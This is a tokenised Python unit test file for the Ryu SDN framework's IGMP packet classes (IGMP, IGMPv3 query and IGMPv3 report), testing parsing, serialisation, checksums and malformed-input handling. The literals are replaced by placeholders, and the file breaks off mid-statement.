<s> import unittest <EOL> import inspect <EOL> import logging <EOL> import six <EOL> from struct import pack , unpack_from , pack_into <EOL> from nose . tools import ok_ , eq_ , raises <EOL> from ryu . ofproto import ether <EOL> from ryu . ofproto import inet <EOL> from ryu . lib . packet . ethernet import ethernet <EOL> from ryu . lib . packet . ipv4 import ipv4 <EOL> from ryu . lib . packet . packet import Packet <EOL> from ryu . lib . packet . packet_utils import checksum <EOL> from ryu . lib import addrconv <EOL> from ryu . lib . packet . igmp import igmp <EOL> from ryu . lib . packet . igmp import igmpv3_query <EOL> from ryu . lib . packet . igmp import igmpv3_report <EOL> from ryu . lib . packet . igmp import igmpv3_report_group <EOL> from ryu . lib . packet . igmp import IGMP_TYPE_QUERY <EOL> from ryu . lib . packet . igmp import IGMP_TYPE_REPORT_V3 <EOL> from ryu . lib . packet . igmp import MODE_IS_INCLUDE <EOL> LOG = logging . getLogger ( __name__ ) <EOL> class Test_igmp ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> self . msgtype = IGMP_TYPE_QUERY <EOL> self . maxresp = <NUM_LIT:100> <EOL> self . csum = <NUM_LIT:0> <EOL> self . address = '<STR_LIT>' <EOL> self . buf = pack ( igmp . _PACK_STR , self . msgtype , self . maxresp , <EOL> self . csum , <EOL> addrconv . ipv4 . text_to_bin ( self . address ) ) <EOL> self . g = igmp ( self . msgtype , self . maxresp , self . csum , <EOL> self . address ) <EOL> def tearDown ( self ) : <EOL> pass <EOL> def find_protocol ( self , pkt , name ) : <EOL> for p in pkt . protocols : <EOL> if p . protocol_name == name : <EOL> return p <EOL> def test_init ( self ) : <EOL> eq_ ( self . msgtype , self . g . msgtype ) <EOL> eq_ ( self . maxresp , self . g . maxresp ) <EOL> eq_ ( self . csum , self . g . csum ) <EOL> eq_ ( self . address , self . g . address ) <EOL> def test_parser ( self ) : <EOL> _res = self . g . parser ( self . buf ) <EOL> if type ( _res ) is tuple : <EOL> res = _res [ <NUM_LIT:0> ] <EOL> else : <EOL> res = _res <EOL> eq_ ( res . msgtype , self . msgtype ) <EOL> eq_ ( res . maxresp , self . maxresp ) <EOL> eq_ ( res . csum , self . csum ) <EOL> eq_ ( res . address , self . address ) <EOL> def test_serialize ( self ) : <EOL> data = bytearray ( ) <EOL> prev = None <EOL> buf = self . g . serialize ( data , prev ) <EOL> res = unpack_from ( igmp . _PACK_STR , six . binary_type ( buf ) ) <EOL> eq_ ( res [ <NUM_LIT:0> ] , self . msgtype ) <EOL> eq_ ( res [ <NUM_LIT:1> ] , self . maxresp ) <EOL> eq_ ( res [ <NUM_LIT:2> ] , checksum ( self . buf ) ) <EOL> eq_ ( res [ <NUM_LIT:3> ] , addrconv . ipv4 . text_to_bin ( self . address ) ) <EOL> def _build_igmp ( self ) : <EOL> dl_dst = '<STR_LIT>' <EOL> dl_src = '<STR_LIT>' <EOL> dl_type = ether . ETH_TYPE_IP <EOL> e = ethernet ( dl_dst , dl_src , dl_type ) <EOL> total_length = <NUM_LIT:20> + igmp . _MIN_LEN <EOL> nw_proto = inet . IPPROTO_IGMP <EOL> nw_dst = '<STR_LIT>' <EOL> nw_src = '<STR_LIT>' <EOL> i = ipv4 ( total_length = total_length , src = nw_src , dst = nw_dst , <EOL> proto = nw_proto ) <EOL> p = Packet ( ) <EOL> p . add_protocol ( e ) <EOL> p . add_protocol ( i ) <EOL> p . add_protocol ( self . g ) <EOL> p . serialize ( ) <EOL> return p <EOL> def test_build_igmp ( self ) : <EOL> p = self . _build_igmp ( ) <EOL> e = self . find_protocol ( p , "<STR_LIT>" ) <EOL> ok_ ( e ) <EOL> eq_ ( e . ethertype , ether . ETH_TYPE_IP ) <EOL> i = self . find_protocol ( p , "<STR_LIT>" ) <EOL> ok_ ( i ) <EOL> eq_ ( i . proto , inet . IPPROTO_IGMP ) <EOL> g = self . find_protocol ( p , "<STR_LIT>" ) <EOL> ok_ ( g ) <EOL> eq_ ( g . msgtype , self . msgtype ) <EOL> eq_ ( g . maxresp , self . maxresp ) <EOL> eq_ ( g . csum , checksum ( self . buf ) ) <EOL> eq_ ( g . address , self . address ) <EOL> def test_to_string ( self ) : <EOL> igmp_values = { '<STR_LIT>' : repr ( self . msgtype ) , <EOL> '<STR_LIT>' : repr ( self . maxresp ) , <EOL> '<STR_LIT>' : repr ( self . csum ) , <EOL> '<STR_LIT:address>' : repr ( self . address ) } <EOL> _g_str = '<STR_LIT:U+002C>' . join ( [ '<STR_LIT>' % ( k , igmp_values [ k ] ) <EOL> for k , v in inspect . getmembers ( self . g ) <EOL> if k in igmp_values ] ) <EOL> g_str = '<STR_LIT>' % ( igmp . __name__ , _g_str ) <EOL> eq_ ( str ( self . g ) , g_str ) <EOL> eq_ ( repr ( self . g ) , g_str ) <EOL> @ raises ( Exception ) <EOL> def test_malformed_igmp ( self ) : <EOL> m_short_buf = self . buf [ <NUM_LIT:1> : igmp . _MIN_LEN ] <EOL> igmp . parser ( m_short_buf ) <EOL> def test_default_args ( self ) : <EOL> ig = igmp ( ) <EOL> buf = ig . serialize ( bytearray ( ) , None ) <EOL> res = unpack_from ( igmp . _PACK_STR , six . binary_type ( buf ) ) <EOL> eq_ ( res [ <NUM_LIT:0> ] , <NUM_LIT> ) <EOL> eq_ ( res [ <NUM_LIT:1> ] , <NUM_LIT:0> ) <EOL> eq_ ( res [ <NUM_LIT:3> ] , addrconv . ipv4 . text_to_bin ( '<STR_LIT>' ) ) <EOL> def test_json ( self ) : <EOL> jsondict = self . g . to_jsondict ( ) <EOL> g = igmp . from_jsondict ( jsondict [ '<STR_LIT>' ] ) <EOL> eq_ ( str ( self . g ) , str ( g ) ) <EOL> class Test_igmpv3_query ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> self . msgtype = IGMP_TYPE_QUERY <EOL> self . maxresp = <NUM_LIT:100> <EOL> self . csum = <NUM_LIT:0> <EOL> self . address = '<STR_LIT>' <EOL> self . s_flg = <NUM_LIT:0> <EOL> self . qrv = <NUM_LIT:2> <EOL> self . qqic = <NUM_LIT:10> <EOL> self . num = <NUM_LIT:0> <EOL> self . srcs = [ ] <EOL> self . s_qrv = self . s_flg << <NUM_LIT:3> | self . qrv <EOL> self . buf = pack ( igmpv3_query . _PACK_STR , self . msgtype , <EOL> self . maxresp , self . csum , <EOL> addrconv . ipv4 . text_to_bin ( self . address ) , <EOL> self . s_qrv , self . qqic , self . num ) <EOL> self . g = igmpv3_query ( <EOL> self . msgtype , self . maxresp , self . csum , self . address , <EOL> self . s_flg , self . qrv , self . qqic , self . num , self . srcs ) <EOL> def setUp_with_srcs ( self ) : <EOL> self . srcs = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> self . num = len ( self . srcs ) <EOL> self . buf = pack ( igmpv3_query . _PACK_STR , self . msgtype , <EOL> self . maxresp , self . csum , <EOL> addrconv . ipv4 . text_to_bin ( self . address ) , <EOL> self . s_qrv , self . qqic , self . num ) <EOL> for src in self . srcs : <EOL> self . buf += pack ( '<STR_LIT>' , addrconv . ipv4 . text_to_bin ( src ) ) <EOL> self . g = igmpv3_query ( <EOL> self . msgtype , self . maxresp , self . csum , self . address , <EOL> self . s_flg , self . qrv , self . qqic , self . num , self . srcs ) <EOL> def tearDown ( self ) : <EOL> pass <EOL> def find_protocol ( self , pkt , name ) : <EOL> for p in pkt . protocols : <EOL> if p . protocol_name == name : <EOL> return p <EOL> def test_init ( self ) : <EOL> eq_ ( self . msgtype , self . g . msgtype ) <EOL> eq_ ( self . maxresp , self . g . maxresp ) <EOL> eq_ ( self . csum , self . g . csum ) <EOL> eq_ ( self . address , self . g . address ) <EOL> eq_ ( self . s_flg , self . g . s_flg ) <EOL> eq_ ( self . qrv , self . g . qrv ) <EOL> eq_ ( self . qqic , self . g . qqic ) <EOL> eq_ ( self . num , self . g . num ) <EOL> eq_ ( self . srcs , self . g . srcs ) <EOL> def test_init_with_srcs ( self ) : <EOL> self . setUp_with_srcs ( ) <EOL> self . test_init ( ) <EOL> def test_parser ( self ) : <EOL> _res = self . g . parser ( self . buf ) <EOL> if type ( _res ) is tuple : <EOL> res = _res [ <NUM_LIT:0> ] <EOL> else : <EOL> res = _res <EOL> eq_ ( res . msgtype , self . msgtype ) <EOL> eq_ ( res . maxresp , self . maxresp ) <EOL> eq_ ( res . csum , self . csum ) <EOL> eq_ ( res . address , self . address ) <EOL> eq_ ( res . s_flg , self . s_flg ) <EOL> eq_ ( res . qrv , self . qrv ) <EOL> eq_ ( res . qqic , self . qqic ) <EOL> eq_ ( res . num , self . num ) <EOL> eq_ ( res . srcs , self . srcs ) <EOL> def test_parser_with_srcs ( self ) : <EOL> self . setUp_with_srcs ( ) <EOL> self . test_parser ( ) <EOL> def test_serialize ( self ) : <EOL> data = bytearray ( ) <EOL> prev = None <EOL> buf = self . g . serialize ( data , prev ) <EOL> res = unpack_from ( igmpv3_query . _PACK_STR , six . binary_type ( buf ) ) <EOL> eq_ ( res [ <NUM_LIT:0> ] , self . msgtype ) <EOL> eq_ ( res [ <NUM_LIT:1> ] , self . maxresp ) <EOL> eq_ ( res [ <NUM_LIT:2> ] , checksum ( self . buf ) ) <EOL> eq_ ( res [ <NUM_LIT:3> ] , addrconv . ipv4 . text_to_bin ( self . address ) ) <EOL> eq_ ( res [ <NUM_LIT:4> ] , self . s_qrv ) <EOL> eq_ ( res [ <NUM_LIT:5> ] , self . qqic ) <EOL> eq_ ( res [ <NUM_LIT:6> ] , self . num ) <EOL> def test_serialize_with_srcs ( self ) : <EOL> self . setUp_with_srcs ( ) <EOL> data = bytearray ( ) <EOL> prev = None <EOL> buf = self . g . serialize ( data , prev ) <EOL> res = unpack_from ( igmpv3_query . _PACK_STR , six . binary_type ( buf ) ) <EOL> ( src1 , src2 , src3 ) = unpack_from ( '<STR_LIT>' , six . binary_type ( buf ) , <EOL> igmpv3_query . _MIN_LEN ) <EOL> eq_ ( res [ <NUM_LIT:0> ] , self . msgtype ) <EOL> eq_ ( res [ <NUM_LIT:1> ] , self . maxresp ) <EOL> eq_ ( res [ <NUM_LIT:2> ] , checksum ( self . buf ) ) <EOL> eq_ ( res [ <NUM_LIT:3> ] , addrconv . ipv4 . text_to_bin ( self . address ) ) <EOL> eq_ ( res [ <NUM_LIT:4> ] , self . s_qrv ) <EOL> eq_ ( res [ <NUM_LIT:5> ] , self . qqic ) <EOL> eq_ ( res [ <NUM_LIT:6> ] , self . num ) <EOL> eq_ ( src1 , addrconv . ipv4 . text_to_bin ( self . srcs [ <NUM_LIT:0> ] ) ) <EOL> eq_ ( src2 , addrconv . ipv4 . text_to_bin ( self . srcs [ <NUM_LIT:1> ] ) ) <EOL> eq_ ( src3 , addrconv . ipv4 . text_to_bin ( self . srcs [ <NUM_LIT:2> ] ) ) <EOL> def _build_igmp ( self ) : <EOL> dl_dst = '<STR_LIT>' <EOL> dl_src = '<STR_LIT>' <EOL> dl_type = ether . ETH_TYPE_IP <EOL> e = ethernet ( dl_dst , dl_src , dl_type ) <EOL> total_length = len ( ipv4 ( ) ) + len ( self . g ) <EOL> nw_proto = inet . IPPROTO_IGMP <EOL> nw_dst = '<STR_LIT>' <EOL> nw_src = '<STR_LIT>' <EOL> i = ipv4 ( total_length = total_length , src = nw_src , dst = nw_dst , <EOL> proto = nw_proto , ttl = <NUM_LIT:1> ) <EOL> p = Packet ( ) <EOL> p . add_protocol ( e ) <EOL> p . add_protocol ( i ) <EOL> p . add_protocol ( self . g ) <EOL> p . serialize ( ) <EOL> return p <EOL> def test_build_igmp ( self ) : <EOL> p = self . _build_igmp ( ) <EOL> e = self . find_protocol ( p , "<STR_LIT>" ) <EOL> ok_ ( e ) <EOL> eq_ ( e . ethertype , ether . ETH_TYPE_IP ) <EOL> i = self . find_protocol ( p , "<STR_LIT>" ) <EOL> ok_ ( i ) <EOL> eq_ ( i . proto , inet . IPPROTO_IGMP ) <EOL> g = self . find_protocol ( p , "<STR_LIT>" ) <EOL> ok_ ( g ) <EOL> eq_ ( g . msgtype , self . msgtype ) <EOL> eq_ ( g . maxresp , self . maxresp ) <EOL> eq_ ( g . csum , checksum ( self . buf ) ) <EOL> eq_ ( g . address , self . address ) <EOL> eq_ ( g . s_flg , self . s_flg ) <EOL> eq_ ( g . qrv , self . qrv ) <EOL> eq_ ( g . qqic , self . qqic ) <EOL> eq_ ( g . num , self . num ) <EOL> eq_ ( g . srcs , self . srcs ) <EOL> def test_build_igmp_with_srcs ( self ) : <EOL> self . setUp_with_srcs ( ) <EOL> self . test_build_igmp ( ) <EOL> def test_to_string ( self ) : <EOL> igmp_values = { '<STR_LIT>' : repr ( self . msgtype ) , <EOL> '<STR_LIT>' : repr ( self . maxresp ) , <EOL> '<STR_LIT>' : repr ( self . csum ) , <EOL> '<STR_LIT:address>' : repr ( self . address ) , <EOL> '<STR_LIT>' : repr ( self . s_flg ) , <EOL> '<STR_LIT>' : repr ( self . qrv ) , <EOL> '<STR_LIT>' : repr ( self . qqic ) , <EOL> '<STR_LIT>' : repr ( self . num ) , <EOL> '<STR_LIT>' : repr ( self . srcs ) } <EOL> _g_str = '<STR_LIT:U+002C>' . join ( [ '<STR_LIT>' % ( k , igmp_values [ k ] ) <EOL> for k , v in inspect . getmembers ( self . g ) <EOL> if k in igmp_values ] ) <EOL> g_str = '<STR_LIT>' % ( igmpv3_query . __name__ , _g_str ) <EOL> eq_ ( str ( self . g ) , g_str ) <EOL> eq_ ( repr ( self . g ) , g_str ) <EOL> def test_to_string_with_srcs ( self ) : <EOL> self . setUp_with_srcs ( ) <EOL> self . test_to_string ( ) <EOL> @ raises ( Exception ) <EOL> def test_num_larger_than_srcs ( self ) : <EOL> self . srcs = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> self . num = len ( self . srcs ) + <NUM_LIT:1> <EOL> self . buf = pack ( igmpv3_query . _PACK_STR , self . msgtype , <EOL> self . maxresp , self . csum , <EOL> addrconv . ipv4 . text_to_bin ( self . address ) , <EOL> self . s_qrv , self . qqic , self . num ) <EOL> for src in self . srcs : <EOL> self . buf += pack ( '<STR_LIT>' , addrconv . ipv4 . text_to_bin ( src ) ) <EOL> self . g = igmpv3_query ( <EOL> self . msgtype , self . maxresp , self . csum , self . address , <EOL> self . s_flg , self . qrv , self . qqic , self . num , self . srcs ) <EOL> self . test_parser ( ) <EOL> @ raises ( Exception ) <EOL> def test_num_smaller_than_srcs ( self ) : <EOL> self . srcs = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> self . num = len ( self . srcs ) - <NUM_LIT:1> <EOL> self . buf = pack ( igmpv3_query . _PACK_STR , self . msgtype , <EOL> self . maxresp , self . csum , <EOL> addrconv . ipv4 . text_to_bin ( self . address ) , <EOL> self . s_qrv , self . qqic , self . num ) <EOL> for src in self . srcs : <EOL> self . buf += pack ( '<STR_LIT>' , addrconv . ipv4 . text_to_bin ( src ) ) <EOL> self . g = igmpv3_query ( <EOL> self . msgtype , self . maxresp , self . csum , self . address , <EOL> self . s_flg , self . qrv , self . qqic , self . num , self . srcs ) <EOL> self . test_parser ( ) <EOL> def test_default_args ( self ) : <EOL> prev = ipv4 ( proto = inet . IPPROTO_IGMP ) <EOL> g = igmpv3_query ( ) <EOL> prev . serialize ( g , None ) <EOL> buf = g . serialize ( bytearray ( ) , prev ) <EOL> res = unpack_from ( igmpv3_query . _PACK_STR , six . binary_type ( buf ) ) <EOL> buf = bytearray ( buf ) <EOL> pack_into ( '<STR_LIT>' , buf , <NUM_LIT:2> , <NUM_LIT:0> ) <EOL> eq_ ( res [ <NUM_LIT:0> ] , IGMP_TYPE_QUERY ) <EOL> eq_ ( res [ <NUM_LIT:1> ] , <NUM_LIT:100> ) <EOL> eq_ ( res [ <NUM_LIT:2> ] , checksum ( buf ) ) <EOL> eq_ ( res [ <NUM_LIT:3> ] , addrconv . ipv4 . text_to_bin ( '<STR_LIT>' ) ) <EOL> eq_ ( res [ <NUM_LIT:4> ] , <NUM_LIT:2> ) <EOL> eq_ ( res [ <NUM_LIT:5> ] , <NUM_LIT:0> ) <EOL> eq_ ( res [ <NUM_LIT:6> ] , <NUM_LIT:0> ) <EOL> prev = ipv4 ( proto = inet . IPPROTO_IGMP ) <EOL> srcs = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> g = igmpv3_query ( srcs = srcs ) <EOL> prev . serialize ( g , None ) <EOL> buf = g . serialize ( bytearray ( ) , prev ) <EOL> res = unpack_from ( igmpv3_query . _PACK_STR , six . binary_type ( buf ) ) <EOL> buf = bytearray ( buf ) <EOL> pack_into ( '<STR_LIT>' , buf , <NUM_LIT:2> , <NUM_LIT:0> ) <EOL> eq_ ( res [ <NUM_LIT:0> ] , IGMP_TYPE_QUERY ) <EOL> eq_ ( res [ <NUM_LIT:1> ] , <NUM_LIT:100> ) <EOL> eq_ ( res [ <NUM_LIT:2> ] , checksum ( buf ) ) <EOL> eq_ ( res [ <NUM_LIT:3> ] , addrconv . ipv4 . text_to_bin ( '<STR_LIT>' ) ) <EOL> eq_ ( res [ <NUM_LIT:4> ] , <NUM_LIT:2> ) <EOL> eq_ ( res [ <NUM_LIT:5> ] , <NUM_LIT:0> ) <EOL> eq_ ( res [ <NUM_LIT:6> ] , len ( srcs ) ) <EOL> res = unpack_from ( '<STR_LIT>' , six . binary_type ( buf ) , igmpv3_query . _MIN_LEN ) <EOL> eq_ ( res [ <NUM_LIT:0> ] , addrconv . ipv4 . text_to_bin ( srcs [ <NUM_LIT:0> ] ) ) <EOL> eq_ ( res [ <NUM_LIT:1> ] , addrconv . ipv4 . text_to_bin ( srcs [ <NUM_LIT:1> ] ) ) <EOL> eq_ ( res [ <NUM_LIT:2> ] , addrconv . ipv4 . text_to_bin ( srcs [ <NUM_LIT:2> ] ) ) <EOL> def test_json ( self ) : <EOL> jsondict = self . g . to_jsondict ( ) <EOL> g = igmpv3_query . from_jsondict ( jsondict [ '<STR_LIT>' ] ) <EOL> eq_ ( str ( self . g ) , str ( g ) ) <EOL> def test_json_with_srcs ( self ) : <EOL> self . setUp_with_srcs ( ) <EOL> self . test_json ( ) <EOL> class Test_igmpv3_report ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> self . msgtype = IGMP_TYPE_REPORT_V3 <EOL> self . csum = <NUM_LIT:0> <EOL> self . record_num = <NUM_LIT:0> <EOL> self . records = [ ] <EOL> self . buf = pack ( igmpv3_report . _PACK_STR , self . msgtype , <EOL> self . csum , self . record_num ) <EOL> self . g = igmpv3_report ( <EOL> self . msgtype , self . csum , self . record_num , self . records ) <EOL> def setUp_with_records ( self ) : <EOL> self . record1 = igmpv3_report_group ( <EOL> MODE_IS_INCLUDE , <NUM_LIT:0> , <NUM_LIT:0> , '<STR_LIT>' ) <EOL> self . record2 = igmpv3_report_group ( <EOL> MODE_IS_INCLUDE , <NUM_LIT:0> , <NUM_LIT:2> , '<STR_LIT>' , <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . record3 = igmpv3_report_group ( <EOL> MODE_IS_INCLUDE , <NUM_LIT:1> , <NUM_LIT:0> , '<STR_LIT>' , [ ] , b'<STR_LIT>' ) <EOL> self . record4 = igmpv3_report_group ( <EOL> MODE_IS_INCLUDE , <NUM_LIT:2> , <NUM_LIT:2> , '<STR_LIT>' , <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] , b'<STR_LIT>' ) <EOL> self . records = [ self . record1 , self . record2 , self . record3 , <EOL> self . record4 ] <EOL> self . record_num = len ( self . records ) <EOL> self . buf = pack ( igmpv3_report . _PACK_STR , self . msgtype , <EOL> self . csum , self . record_num ) <EOL> self . buf += self . record1 . serialize ( ) <EOL> self . buf += self . record2 . serialize ( ) <EOL> self . buf += self . record3 . serialize ( ) <EOL> self . buf += self . record4 . serialize ( ) <EOL> self . g = igmpv3_report ( <EOL> self . msgtype , self . csum , self . record_num , self . records ) <EOL> def tearDown ( self ) : <EOL> pass <EOL> def find_protocol ( self , pkt , name ) : <EOL> for p in pkt . protocols : <EOL> if p . protocol_name == name : <EOL> return p <EOL> def test_init ( self ) : <EOL> eq_ ( self . msgtype , self . g . msgtype ) <EOL> eq_ ( self . csum , self . g . csum ) <EOL> eq_ ( self . record_num , self . g . record_num ) <EOL> eq_ ( self . records , self . g . records ) <EOL> def test_init_with_records ( self ) : <EOL> self . setUp_with_records ( ) <EOL> self . test_init ( ) <EOL> def test_parser ( self ) : <EOL> _res = self . g . parser ( six . binary_type ( self . buf ) ) <EOL> if type ( _res ) is tuple : <EOL> res = _res [ <NUM_LIT:0> ] <EOL> else : <EOL> res = _res <EOL> eq_ ( res . msgtype , self . msgtype ) <EOL> eq_ ( res . csum , self . csum ) <EOL> eq_ ( res . record_num , self . record_num ) <EOL> eq_ ( repr ( res . records ) , repr ( self . records ) ) <EOL> def test_parser_with_records ( self ) : <EOL> self . setUp_with_records ( ) <EOL> self . test_parser ( ) <EOL> def test_serialize ( self ) : <EOL> data = bytearray ( ) <EOL> prev = None <EOL> buf = self . g . serialize ( data , prev ) <EOL> res = unpack_from ( igmpv3_report . _PACK_STR , six . binary_type ( buf ) ) <EOL> eq_ ( res [ <NUM_LIT:0> ] , self . msgtype ) <EOL> eq_ ( res [ <NUM_LIT:1> ] , checksum ( self . buf ) ) <EOL> eq_ ( res [ <NUM_LIT:2> ] , self . record_num ) <EOL> def test_serialize_with_records ( self ) : <EOL> self . setUp_with_records ( ) <EOL> data = bytearray ( ) <EOL> prev = None <EOL> buf = six . binary_type ( self . g . serialize ( data , prev ) ) <EOL> res = unpack_from ( igmpv3_report . _PACK_STR , buf ) <EOL> offset = igmpv3_report . _MIN_LEN <EOL> rec1 = igmpv3_report_group . parser ( buf [ offset : ] ) <EOL> offset += len ( rec1 ) <EOL> rec2 = igmpv3_report_group . parser ( buf [ offset : ] ) <EOL> offset += len ( rec2 ) <EOL> rec3 = igmpv3_report_group . parser ( buf [ offset : ] ) <EOL> offset += len ( rec3 ) <EOL> rec4 = igmpv3_report_group . parser ( buf [ offset : ] ) <EOL> eq_ ( res [ <NUM_LIT:0> ] , self . msgtype ) <EOL> eq_ ( res [ <NUM_LIT:1> ] , checksum ( self . buf ) ) <EOL> eq_ ( res [ <NUM_LIT:2> ] , self . record_num ) <EOL> eq_ ( repr ( rec1 ) , repr ( self . record1 ) ) <EOL> eq_ ( repr ( rec2 ) , repr ( self . record2 ) ) <EOL> eq_ ( repr ( rec3 ) , repr ( self . record3 ) ) <EOL> eq_ ( repr ( rec4 ) , repr ( self . record4 ) ) <EOL> def _build_igmp ( self ) : <EOL> dl_dst = '<STR_LIT>' <EOL> dl_src = '<STR_LIT>' <EOL> dl_type = ether . ETH_TYPE_IP <EOL> e = ethernet ( dl_dst , dl_src , dl_type ) <EOL> total_length = len ( ipv4 ( ) ) + len ( self . g ) <EOL> nw_proto = inet . IPPROTO_IGMP <EOL> nw_dst = '<STR_LIT>' <EOL> nw_src = '<STR_LIT>' <EOL> i = ipv4 ( total_length = total_length , src = nw_src , dst = nw_dst , <EOL> proto = nw_proto , ttl = <NUM_LIT:1> ) <EOL> p = Packet ( ) <EOL> p . add_protocol ( e ) <EOL> p . add_protocol ( i ) <EOL> p . add_protocol ( self . g ) <EOL> p . serialize ( ) <EOL> return p <EOL> def test_build_igmp ( self ) : <EOL> p = self . _build_igmp ( ) <EOL> e = self . find_protocol ( p , "<STR_LIT>" ) <EOL> ok_ ( e ) <EOL> eq_ ( e . ethertype , ether . ETH_TYPE_IP ) <EOL> i = self . find_protocol ( p , "<STR_LIT>" ) <EOL> ok_ ( i ) <EOL> eq_ ( i . proto , inet . IPPROTO_IGMP ) <EOL> g = self . find_protocol ( p , "<STR_LIT>" ) <EOL> ok_ ( g ) <EOL> eq_ ( g . msgtype , self . msgtype ) <EOL> eq_ ( g . csum , checksum ( self . buf ) ) <EOL> eq_ ( g . record_num , self . record_num ) <EOL> eq_ ( g . records , self . records ) <EOL> def test_build_igmp_with_records ( self ) : <EOL> self . setUp_with_records ( ) <EOL> self . test_build_igmp ( ) <EOL> def test_to_string ( self ) : <EOL> igmp_values = { '<STR_LIT>' : repr ( self . msgtype ) , <EOL> '<STR_LIT>' : repr ( self . csum ) , <EOL> '<STR_LIT>' : repr ( self . record_num ) , <EOL> '<STR_LIT>' : repr ( self . records ) } <EOL> _g_str = '<STR_LIT:U+002C>' . join ( [ '<STR_LIT>' % ( k , igmp_values [ k ] ) <EOL> for k , v in inspect . getmembers ( self . g ) <EOL> if k in igmp_values ] ) <EOL> g_str = '<STR_LIT>' % ( igmpv3_report . __name__ , _g_str ) <EOL> eq_ ( str ( self . g ) , g_str ) <EOL> eq_ ( repr ( self . g ) , g_str ) <EOL> def test_to_string_with_records ( self ) : <EOL> self . setUp_with_records ( ) <EOL> self . test_to_string ( ) <EOL> @ raises ( Exception ) <EOL> def test_record_num_larger_than_records ( self ) : <EOL> self . record1 = igmpv3_report_group ( <EOL> MODE_IS_INCLUDE , <NUM_LIT:0> , <NUM_LIT:0> , '<STR_LIT>' ) <EOL> self . record2 = igmpv3_report_group ( <EOL> MODE_IS_INCLUDE , <NUM_LIT:0> , <NUM_LIT:2> , '<STR_LIT>' , <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . record3 = igmpv3_report_group ( <EOL> MODE_IS_INCLUDE , <NUM_LIT:1> , <NUM_LIT:0> , '<STR_LIT>' , [ ] , b'<STR_LIT>' ) <EOL> self . record4 = igmpv3_report_group ( <EOL> MODE_IS_INCLUDE , <NUM_LIT:1> , <NUM_LIT:2> , '<STR_LIT>' , <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] , b'<STR_LIT>' ) <EOL> self . records = [ self . record1 , self . record2 , self . record3 , <EOL> self . record4 ] <EOL> self . record_num = len ( self . records ) + <NUM_LIT:1> <EOL> self . buf = pack ( igmpv3_report . _PACK_STR , self . msgtype , <EOL> self . csum , self . record_num ) <EOL> self . buf += self . record1 . serialize ( ) <EOL> self . buf += self . record2 . serialize ( ) <EOL> self . buf += self . record3 . serialize ( ) <EOL> self . buf += self . record4 . serialize ( ) <EOL> self . g = igmpv3_report ( <EOL> self . msgtype , self . csum , self . record_num , self . records ) <EOL> self . test_parser ( ) <EOL> @ raises ( Exception ) <EOL> def test_record_num_smaller_than_records ( self ) : <EOL> self . record1 = igmpv3_report_group ( <EOL> MODE_IS_INCLUDE , <NUM_LIT:0> , <NUM_LIT:0> , '<STR_LIT>' ) <EOL> self . record2 = igmpv3_report_group ( <EOL> MODE_IS_INCLUDE , <NUM_LIT:0> , <NUM_LIT:2> , '<STR_LIT>' , <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . record3 = igmpv3_report_group ( <EOL> MODE_IS_INCLUDE , <NUM_LIT:1> , <NUM_LIT:0> , '<STR_LIT>' , [ ] , b'<STR_LIT>' ) <EOL> self . record4 = igmpv3_report_group ( <EOL> MODE_IS_INCLUDE , <NUM_LIT:1> , <NUM_LIT:2> , '<STR_LIT>' , <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] , b'<STR_LIT>' ) <EOL> self . records = [ self . record1 , self . record2 , self . record3 , <EOL> self . record4 ] <EOL> self . record_num = len ( self . records ) - <NUM_LIT:1> <EOL> self . buf = pack ( igmpv3_report . _PACK_STR , self . msgtype , <EOL> self . csum , self . record_num ) <EOL> self . buf += self . record1 . serialize ( ) <EOL> self . buf += self . record2 . serialize ( ) <EOL> self . buf += self . record3 . serialize ( ) <EOL> self . buf += self . record4 . serialize ( ) <EOL> self . g = igmpv3_report ( <EOL> self . msgtype , self . csum , self . record_num , self . records ) <EOL> self . test_parser ( ) <EOL> def test_default_args ( self ) : <EOL> prev = ipv4 ( proto = inet . IPPROTO_IGMP ) <EOL> g = igmpv3_report ( ) <EOL> prev . serialize ( g , None ) <EOL> buf = g . serialize ( bytearray ( ) , prev ) <EOL> res = unpack_from ( igmpv3_report . _PACK_STR , six . binary_type ( buf ) ) <EOL> buf = bytearray ( buf ) <EOL> pack_into ( '<STR_LIT>' , buf , <NUM_LIT:2> , <NUM_LIT:0> ) <EOL> eq_ ( res [ <NUM_LIT:0> ] , IGMP_TYPE_REPORT_V3 ) <EOL> eq_ ( res [ <NUM_LIT:1> ] , checksum ( buf ) ) <EOL> eq_ ( res [ <NUM_LIT:2> ] , <NUM_LIT:0> ) <EOL> prev = ipv4 ( proto = inet . IPPROTO_IGMP ) <EOL> record1 = igmpv3_report_group ( <EOL> MODE_IS_INCLUDE , <NUM_LIT:0> , <NUM_LIT:0> , '<STR_LIT>' ) <EOL> record2 = igmpv3_report_group ( <EOL> MODE_IS_INCLUDE , <NUM_LIT:0> , <NUM_LIT:2> , '<STR_LIT>' , <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> record3 = igmpv3_report_group ( <EOL> MODE_IS_INCLUDE , <NUM_LIT:1> , <NUM_LIT:0> , '<STR_LIT>' , [ ] , b'<STR_LIT>' ) <EOL> record4 = igmpv3_report_group ( <EOL> MODE_IS_INCLUDE , <NUM_LIT:1> , <NUM_LIT:2> , '<STR_LIT>' , <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] , b'<STR_LIT>' ) <EOL> records = [ record1 , record2 , record3 , record4 ] <EOL> g = igmpv3_report ( records = records ) <EOL> prev . serialize ( g , None ) <EOL> buf = g . serialize ( bytearray ( ) , prev ) <EOL> res = unpack_from ( igmpv3_report . _PACK_STR , six . binary_type ( buf ) ) <EOL> buf = bytearray ( buf ) <EOL> pack_into ( '<STR_LIT>' , buf , <NUM_LIT:2> , <NUM_LIT:0> ) <EOL> eq_ ( res [ 